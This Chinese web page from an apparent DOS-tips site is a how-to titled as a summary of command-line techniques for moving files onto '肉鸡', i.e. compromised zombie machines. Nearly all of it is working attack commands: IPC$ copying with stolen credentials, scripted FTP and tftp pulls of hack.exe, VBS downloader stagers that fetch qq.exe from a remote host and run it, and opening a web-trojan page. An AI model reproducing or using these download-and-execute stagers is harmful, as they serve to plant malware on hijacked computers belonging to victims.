- ·上一篇文章:窗口最小化后在任务栏看不见的解决方法
- ·下一篇文章:VBS终极应用 微型邮箱客户端 1K不到 带发送附件功能
- ·百度中搜索更多的关于“命令行下向肉鸡传文件终级技巧总结”相关内容
- ·谷歌中搜索更多的关于“命令行下向肉鸡传文件终级技巧总结”相关内容
- ******申明******
- 本站文章内容有部分为收录网络中其他网友内容,DOS资源站不保证所有的代码都适合你使用。
- 由于编辑匆忙,有可能造成某些脚本文件出现丢失代码或代码无法运行的情况,请网友根据情况自行修改。
- 如果能将出错部分反馈给我,那就更好了。
命令行下向肉鸡传文件终级技巧总结
方法一:利用IPC$共享传送方式
net use \IP\共享目录(后面要大$) "密码" /user:"用户名"
copy c:\file \IP\共享目录
方法二:FTP方式
echo open xxx.xxx.xxx.xxx>c:\hack.txt
echo user>>c:\hack.txt
echo pass>>c:\hack.txt
echo get hack.exe>>c:\hack.txt
echo bye>>c:\hack.txt
ftp -s:c:\hack.txt
del c:\hack.txt
方法三:tftp方式
条件:首先你得拥有一个公网IP,把你要传送的文件与tftp放在同一目录.
命令格式: tftp -i 你的IP get xx.exe
方法四:脚本法
方法(1):
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://192.168.0.200/qq.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"qq.exe^",2 >sysinfo.vbs
方法(2):
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >sysinfo.vbs
echo xPost.Open "GET","http://192.168.0.200/qq.exe",0 >>sysinfo.vbs
echo xPost.Send() >>sysinfo.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>sysinfo.vbs
echo sGet.Mode = 3 >>sysinfo.vbs
echo sGet.Type = 1 >>sysinfo.vbs
echo sGet.Open() >>sysinfo.vbs
echo sGet.Write(xPost.responseBody) >>sysinfo.vbs
echo sGet.SaveToFile "qq.exe",2 >>sysinfo.vbs
然后执行 cscript sysinfo.vbs就可以了.
方法(3):
type %systemdrive%\\boot.ini 查看系统版本
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://192.168.0.200/qq.exe
qq.exe
qq.exe
qq.exe
其中:http://www.xxx.com/hack.exe 改成你文件的网站路径.
hack.exe可以改成保存文件的路径.
方法五:命令行下执行网页木马
start http://www.xxx.com/mma.htm
其中http://www.xxx.com/mma.htm为你的网页木马地址.

